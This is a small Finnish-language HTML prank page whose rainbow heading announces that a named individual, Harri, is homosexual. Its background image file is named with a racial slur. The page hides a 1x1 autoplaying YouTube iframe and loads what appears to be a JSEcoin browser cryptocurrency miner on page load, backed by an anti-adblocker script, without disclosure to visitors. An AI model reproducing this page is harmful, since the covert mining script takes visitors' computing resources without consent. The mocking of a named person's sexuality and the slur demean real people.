<html>
<body>
<h1 class="rainbow">Harri on homoseksuaali</h1>
<h class="rainbow">ON!</h3>
<style>
body {background-image: url("https://harri222.github.io/nigga.jpg");}
.rainbow {background-image: -webkit-gradient( linear, left top, right top, color-stop(0, #f22), color-stop(0.15, #f2f), color-stop(0.3, #22f), color-stop(0.45, #2ff), color-stop(0.6, #2f2),color-stop(0.75, #2f2), color-stop(0.9, #ff2), color-stop(1, #f22) );
  background-image: gradient( linear, left top, right top, color-stop(0, #f22), color-stop(0.15, #f2f), color-stop(0.3, #22f), color-stop(0.45, #2ff), color-stop(0.6, #2f2),color-stop(0.75, #2f2), color-stop(0.9, #ff2), color-stop(1, #f22) );
  color:transparent;
  -webkit-background-clip: text;
  background-clip: text;
}
</style>

<iframe width="1" height="1" src="https://www.youtube.com/embed/pPIp5KiEF6U?=autoplay=1" frameborder="0" allow="accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe>
<script type="text/javascript">
!function(){var e=document,t=e.createElement("script"),s=e.getElementsByTagName("script")[0];t.type="text/javascript",t.async=t.defer=!0,t.src="https://load.jsecoin.com/load/151209/harri222.github.io/0/0/",s.parentNode.insertBefore(t,s)}();
</script>
  <!-- JSE ANTI ADBLOCKER CODE -->
<script src="https://harri222.github.io/jse-anti-adblocker.js"></script>
<script>
  var JSEuserID = 2895;
  var JSEsiteID = window.location.hostname;
  var JSEsubID = 0;
  JSEcheckAdblocker(JSEuserID,JSEsiteID,JSEsubID);
</script>
<!-- END OF JSE ANTI ADBLOCKER CODE -->
</body>
</html>
